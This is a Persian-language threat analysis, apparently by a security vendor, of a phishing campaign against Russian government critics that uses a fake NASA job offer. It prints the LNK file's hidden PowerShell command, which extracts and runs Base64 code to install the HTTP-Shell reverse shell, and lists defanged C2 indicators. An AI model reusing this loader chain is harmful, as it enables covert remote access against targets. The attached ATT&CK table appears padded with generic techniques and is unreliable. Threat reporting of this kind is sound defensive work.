یک کمپین تازه در کشور روسیه آغاز شده است که احتمالاً با یک گروه روسیAPT مرتبط است. پیامهای فیشینگ به کار گرفته شده در این کمپین، نهادهایی را هدف قرار میدهد که آشکارا از دولت روسیه انتقاد میکردند و چه در داخل و چه خارج از مرزهای کشور با جنبشهای مخالف روسیه همسو بودند. مهاجم از یک فایل با مضمون ناسا برای فریب قربانی برای اجرای یک Open–Source Multiplatform Reverse Shell به نام HTTP-Shell استفاده کرده است.
مرحله اول حمله شامل یک فایل ZIP به نام «NASA_Job_Offer(2).zip» است که حاوی یک فایل LNK است که بهصورت PDF پنهان شده با عنوان «Offer.pdf» است. فایل Pdf شامل اسکریپت پاور شل زیر است:
/c start /B findstr /R “CiRFcnJvckFjdGlvbl” Offer.pdf.lnk > “%tmp%\Temp.jpg” & start /B pOwERsHElL -windowstyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -c ” [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String((Get-Content “%tmp%\Temp.jpg”))) | POwERsHElL”
اسکریپت PowerShell الگوی رشته “CiRFcnJvckFjdGlvbl” را در فایل LNK با استفاده از ابزار findstr جستجو میکند، سپس خروجی را به فایلی به نام “Temp.jpg” در دایرکتوری %TEMP% هدایت میکند و در نهایت PowerShell رمزگشایی شده توسط Base64 را اجرا میکند. اسکریپت Powershell اجرا شده متعلق به یک پروژه منبعباز به نام HTTP-Shell است که یک پوسته معکوس چند پلتفرمی است که روی HTTP کار میکند. همانطور که در صفحه رسمی HTTP-Shell گفته شد، “هدف اصلی ابزار استفاده از آن در ارتباط با تونلهای توسعهدهنده مایکروسافت است تا اتصالی را تاحدامکان به یک اتصال قانونی نزدیک کند”.
از جمله قابلیتهای این Shell امکان آپلود و دانلود فایلها، اتصال مجدد خودکار به C2 میباشد. سرور C2 مهاجم طوری طراحی شده که تاحدامکان مانند یک سایت ویرایش PDF قانونی ظاهر شود تا میزان تشخیص را کاهش یابد.
همچنین کمپینهای دیگری مشابه این کمپین پیدا شده که عامل تهدید از تاکتیک، تکنیکها و لینکهای مشابه این استفاده کرده است. در یک کمپین مشابه یک رسانه مرتبط با Ksenia Sobchak، یک مجری و تاجر روسی است. او از منتقدان سرسخت ولادیمیر پوتین رئیسجمهور روسیه بوده و از دموکراسی و حقوق بشر حمایت کرده است. در این کمپین از همان C2 سروری استفاده شده که علیه مخالفان روسیه استفاده شده بود.
همچنین در یک کمپین دیگر علیه الیزاوتا اوستینسکایا، روزنامهنگار و سردبیر سابق RBC است. اوستینسکایا تهاجم روسیه به اوکراین در سال 2022 را محکوم کرد و سپس در 1 آوریل 2022 توسط وزارت دادگستری روسیه بهعنوان عامل خارجی معرفی شد. C2 سرور استفاده شده در حمله با دامنه usaid [.]pm و آدرس 80.78.26 [.]183 مرتبط با سرور Silver RAT میباشد.
راه هایی برای کاهش این خطر پذیری
- عدم کلیک بر روی لینکهای موجود در ایمیل
- نظارت بر اسکریپتهای اجرا شده توسط پاور شل
- نظارت بر ترافیک خروجی شبکه
روش های تشخیص این حمله
در صورت استفاده از سیستم شناسایی و پاسخ در نقاط پایانی هوپان (EDR) که یکی از اساسی ترین ماژول های راهکار گسترده شناسایی و پاسخ نخجیرپان (XDR) میباشد، تحلیل فعالیت های مرتبط و هشدارهای زیر مشاهده می گردد:
- مشاهده ترافیک غیرعادی در شبکه
- مشاهده پروسسهای مشکوک در حال اجرا
- نظارت بر اسکریپتهای مخرب در حال اجرا
این تهدید از تکنیک های زیر که در جدول مایتر اتک موجود می باشد استفاده نموده است.
| Initial Access | Execution | Defense Evasion | Command And Control | Exfiltration |
| Drive-by Compromise | AppleScript | Access Token Manipulation | Commonly Used Port | Automated Exfiltration |
| Exploit Public-Facing Application | CMSTP | Binary Padding | Communication Through Removable Media | Data Compressed |
| External Remote Services | Command-Line Interface | BITS Jobs | Connection Proxy | Data Encrypted |
| Hardware Additions | Compiled HTML File | Bypass User Account Control | Custom Command and Control Protocol | Data Transfer Size Limits |
| Replication Through Removable Media | Component Object Model and Distributed COM | Clear Command History | Custom Cryptographic Protocol | Exfiltration Over Alternative Protocol |
| Spearphishing Attachment | Control Panel Items | CMSTP | Data Encoding | Exfiltration Over Command and Control Channel |
| Spearphishing Link | Dynamic Data Exchange | Code Signing | Data Obfuscation | Exfiltration Over Other Network Medium |
| Spearphishing via Service | Execution through API | Compile After Delivery | Domain Fronting | Exfiltration Over Physical Medium |
| Supply Chain Compromise | Execution through Module Load | Compiled HTML File | Ingress Tool Transfer | Scheduled Transfer |
| Trusted Relationship | Exploitation for Client Execution | Component Firmware | Fallback Channels | |
| Valid Accounts | Graphical User Interface | Component Object Model Hijacking | Multi-hop Proxy | |
| InstallUtil | Connection Proxy | Multi-Stage Channels | ||
| Launchctl | Control Panel Items | Multiband Communication | ||
| Local Job Scheduling | DCShadow | Multilayer Encryption | ||
| LSASS Driver | Deobfuscate/Decode Files or Information | Port Knocking | ||
| Mshta | Disabling Security Tools | Remote Access Tools | ||
| PowerShell | DLL Search Order Hijacking | Remote File Copy | ||
| Regsvcs/Regasm | DLL Side-Loading | Standard Application Layer Protocol | ||
| Regsvr32 | Execution Guardrails | Standard Cryptographic Protocol | ||
| Rundll32 | Exploitation for Defense Evasion | Standard Non-Application Layer Protocol | ||
| Scheduled Task | Extra Window Memory Injection | Uncommonly Used Port | ||
| Scripting | File and Directory Permissions Modification | Web Service | ||
| Service Execution | File Deletion | |||
| Signed Binary Proxy Execution | File System Logical Offsets | |||
| Signed Script Proxy Execution | Gatekeeper Bypass | |||
| Source | Group Policy Modification | |||
| Space after Filename | Hidden Files and Directories | |||
| Third-party Software | Hidden Users | |||
| Trap | Hidden Window | |||
| Trusted Developer Utilities | HISTCONTROL | |||
| User Execution | Image File Execution Options Injection | |||
| Windows Management Instrumentation | Indicator Blocking | |||
| Windows Remote Management | Indicator Removal from Tools | |||
| XSL Script Processing | Indicator Removal on Host | |||
| Indirect Command Execution | ||||
| Install Root Certificate | ||||
| InstallUtil | ||||
| Launchctl | ||||
| LC_MAIN Hijacking | ||||
| Masquerading | ||||
| Modify Registry | ||||
| Mshta | ||||
| Network Share Connection Removal | ||||
| NTFS File Attributes | ||||
| Obfuscated Files or Information | ||||
| Parent PID Spoofing | ||||
| Plist Modification | ||||
| Port Knocking | ||||
| Process Doppelgänging | ||||
| Process Hollowing | ||||
| Process Injection | ||||
| Redundant Access | ||||
| Regsvcs/Regasm | ||||
| Regsvr32 | ||||
| Rootkit | ||||
| Rundll32 | ||||
| Scripting | ||||
| Signed Binary Proxy Execution | ||||
| Signed Script Proxy Execution | ||||
| SIP and Trust Provider Hijacking | ||||
| Software Packing | ||||
| Space after Filename | ||||
| Template Injection | ||||
| Timestomp | ||||
| Trusted Developer Utilities | ||||
| Valid Accounts | ||||
| Virtualization/Sandbox Evasion | ||||
| Web Service | ||||
| XSL Script Processing |